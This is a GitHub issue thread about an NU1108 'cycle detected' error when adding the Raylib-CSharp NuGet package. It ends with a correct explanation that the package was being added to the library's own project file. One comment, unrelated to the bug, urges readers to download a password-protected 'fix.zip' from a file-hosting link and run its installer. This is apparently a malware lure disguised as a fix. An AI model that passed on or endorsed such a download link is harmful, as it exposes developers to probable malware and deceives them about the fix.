### ISSUE TITLE
[BUG]

### ISSUE THREAD

**Issue by OOaker** [MrScautHD/Raylib-CSharp#12]
**Describe the bug**
PM> dotnet add package Raylib-CSharp --version 4.1.9
  Determining projects to restore...
  Writing C:\Users\u230282\AppData\Local\Temp\tmp2jzceq.tmp
info : X.509 certificate chain validation will use the default trust store selected by .NET for code signing.
info : X.509 certificate chain validation will use the default trust store selected by .NET for timestamping.
info : Adding PackageReference for package 'Raylib-CSharp' into project 'Q:\VCS\Raylib-CSharp\Raylib-CSharp.csproj'.
info : Restoring packages for Q:\VCS\Raylib-CSharp\Raylib-CSharp.csproj...
error: NU1108: Cycle detected. 
error:   Raylib-CSharp -> Raylib-CSharp (>= 4.1.9).

**To Reproduce**
Use the proposed install solution "dotnet add package Raylib-CSharp --version 4.1.9"

**Expected behavior**
That it installs

**Screenshots**

**Desktop (please complete the following information):**
 - OS: Win10
 - Version: VSStudio 2022

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MrScautHD** [comment]
what is the problem?

**Comment by zapturk** [comment]
It looks like you try to add the NuGet packages to .csproj in this repo. This would create a Cycle detection error due to the project containing the same namespace as the nuget package. I would recommend making a new c# project and then running the command to add the package. 
```
dotnet new console -n mygame
dotnet add package Raylib-CSharp --version 4.1.9
```
